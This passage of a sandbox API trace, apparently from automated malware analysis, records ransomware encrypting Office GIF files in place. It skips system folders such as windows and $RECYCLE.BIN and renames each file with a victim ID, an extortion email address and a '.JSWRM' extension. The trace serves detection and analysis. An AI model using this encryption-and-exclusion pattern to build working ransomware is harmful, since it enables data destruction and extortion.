office\\root\\office16\\1033\\pubspapr\\zpdir51f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.776] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0120.776] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0120.776] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0120.776] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae49f22, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae49f22, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae49f22, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x592b, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR5B.GIF", cAlternateFileName="")) returned 1 [0120.776] lstrcmpiW (lpString1="ZPDIR5B.GIF", lpString2=".") returned 1 [0120.776] lstrcmpiW (lpString1="ZPDIR5B.GIF", lpString2="..") returned 1 [0120.776] lstrcmpiW (lpString1="ZPDIR5B.GIF", lpString2="...") returned 1 [0120.776] lstrcmpiW (lpString1="ZPDIR5B.GIF", lpString2="windows") returned 1 [0120.776] lstrcmpiW (lpString1="ZPDIR5B.GIF", lpString2="recovery") returned 1 [0120.776] lstrcmpiW (lpString1="ZPDIR5B.GIF", lpString2="perflogs") returned 1 [0120.776] lstrcmpiW (lpString1="ZPDIR5B.GIF", lpString2="documents and settings") returned 1 [0120.776] lstrcmpiW (lpString1="ZPDIR5B.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.776] lstrcmpiW (lpString1="ZPDIR5B.GIF", lpString2="system volume information") returned 1 [0120.776] lstrcmpiW (lpString1="ZPDIR5B.GIF", lpString2="msocache") returned 1 [0120.776] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0120.777] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR5B.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0120.777] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR5B.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR5B.GIF", lpUsedDefaultChar=0x0) returned 11 [0120.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0120.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0120.777] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR5B.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0120.777] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR5B.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR5B.GIF", lpUsedDefaultChar=0x0) returned 11 [0120.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0120.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0120.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0120.777] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.777] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0120.777] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR5B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir5b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.779] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=22827) returned 1 [0120.779] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5920) returned 0x24e1d8 [0120.779] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x5920, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x5920, lpOverlapped=0x0) returned 1 [0120.782] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.782] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x5920, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x5920, lpOverlapped=0x0) returned 1 [0120.782] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.782] CloseHandle (hObject=0x314) returned 1 [0120.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0120.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0120.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0120.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0120.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0120.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0120.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0120.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0120.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0120.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0120.783] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR5B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir5b.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR5B.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir5b.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0120.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0120.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0120.784] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae49f22, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae49f22, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae49f22, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xdb2e, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR5F.GIF", cAlternateFileName="")) returned 1 [0120.784] lstrcmpiW (lpString1="ZPDIR5F.GIF", lpString2=".") returned 1 [0120.784] lstrcmpiW (lpString1="ZPDIR5F.GIF", lpString2="..") returned 1 [0120.784] lstrcmpiW (lpString1="ZPDIR5F.GIF", lpString2="...") returned 1 [0120.784] lstrcmpiW (lpString1="ZPDIR5F.GIF", lpString2="windows") returned 1 [0120.784] lstrcmpiW (lpString1="ZPDIR5F.GIF", lpString2="recovery") returned 1 [0120.784] lstrcmpiW (lpString1="ZPDIR5F.GIF", lpString2="perflogs") returned 1 [0120.784] lstrcmpiW (lpString1="ZPDIR5F.GIF", lpString2="documents and settings") returned 1 [0120.784] lstrcmpiW (lpString1="ZPDIR5F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.784] lstrcmpiW (lpString1="ZPDIR5F.GIF", lpString2="system volume information") returned 1 [0120.784] lstrcmpiW (lpString1="ZPDIR5F.GIF", lpString2="msocache") returned 1 [0120.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0120.784] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR5F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0120.784] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR5F.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR5F.GIF", lpUsedDefaultChar=0x0) returned 11 [0120.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0120.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0120.784] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR5F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0120.784] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR5F.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR5F.GIF", lpUsedDefaultChar=0x0) returned 11 [0120.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0120.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0120.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0120.784] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.784] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0120.785] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR5F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir5f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.785] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=56110) returned 1 [0120.785] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xdb20) returned 0x24e1d8 [0120.785] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xdb20, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0xdb20, lpOverlapped=0x0) returned 1 [0120.790] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.790] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xdb20, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0xdb20, lpOverlapped=0x0) returned 1 [0120.790] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.790] CloseHandle (hObject=0x314) returned 1 [0120.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0120.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0120.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0120.790] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0120.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0120.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.790] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0120.791] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0120.791] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0120.791] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0120.791] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0120.791] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR5F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir5f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR5F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir5f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.791] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0120.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0120.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0120.792] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae49f22, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae49f22, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae49f22, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2ade, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR6B.GIF", cAlternateFileName="")) returned 1 [0120.792] lstrcmpiW (lpString1="ZPDIR6B.GIF", lpString2=".") returned 1 [0120.792] lstrcmpiW (lpString1="ZPDIR6B.GIF", lpString2="..") returned 1 [0120.792] lstrcmpiW (lpString1="ZPDIR6B.GIF", lpString2="...") returned 1 [0120.792] lstrcmpiW (lpString1="ZPDIR6B.GIF", lpString2="windows") returned 1 [0120.792] lstrcmpiW (lpString1="ZPDIR6B.GIF", lpString2="recovery") returned 1 [0120.792] lstrcmpiW (lpString1="ZPDIR6B.GIF", lpString2="perflogs") returned 1 [0120.792] lstrcmpiW (lpString1="ZPDIR6B.GIF", lpString2="documents and settings") returned 1 [0120.792] lstrcmpiW (lpString1="ZPDIR6B.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.792] lstrcmpiW (lpString1="ZPDIR6B.GIF", lpString2="system volume information") returned 1 [0120.792] lstrcmpiW (lpString1="ZPDIR6B.GIF", lpString2="msocache") returned 1 [0120.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0120.792] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR6B.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0120.792] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR6B.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR6B.GIF", lpUsedDefaultChar=0x0) returned 11 [0120.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0120.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0120.792] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR6B.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0120.792] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR6B.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR6B.GIF", lpUsedDefaultChar=0x0) returned 11 [0120.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0120.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0120.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0120.792] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.792] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0120.792] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR6B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir6b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.793] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=10974) returned 1 [0120.793] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.793] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2ad0) returned 0x24e1d8 [0120.793] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x2ad0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x2ad0, lpOverlapped=0x0) returned 1 [0120.797] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.797] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x2ad0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x2ad0, lpOverlapped=0x0) returned 1 [0120.797] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.797] CloseHandle (hObject=0x314) returned 1 [0120.797] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0120.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.797] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0120.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.797] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0120.797] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0120.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.797] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0120.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0120.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0120.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0120.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0120.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0120.798] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR6B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir6b.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR6B.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir6b.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0120.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0120.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0120.799] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae49f22, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae49f22, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae49f22, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x41e5, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR6F.GIF", cAlternateFileName="")) returned 1 [0120.799] lstrcmpiW (lpString1="ZPDIR6F.GIF", lpString2=".") returned 1 [0120.799] lstrcmpiW (lpString1="ZPDIR6F.GIF", lpString2="..") returned 1 [0120.799] lstrcmpiW (lpString1="ZPDIR6F.GIF", lpString2="...") returned 1 [0120.799] lstrcmpiW (lpString1="ZPDIR6F.GIF", lpString2="windows") returned 1 [0120.799] lstrcmpiW (lpString1="ZPDIR6F.GIF", lpString2="recovery") returned 1 [0120.799] lstrcmpiW (lpString1="ZPDIR6F.GIF", lpString2="perflogs") returned 1 [0120.799] lstrcmpiW (lpString1="ZPDIR6F.GIF", lpString2="documents and settings") returned 1 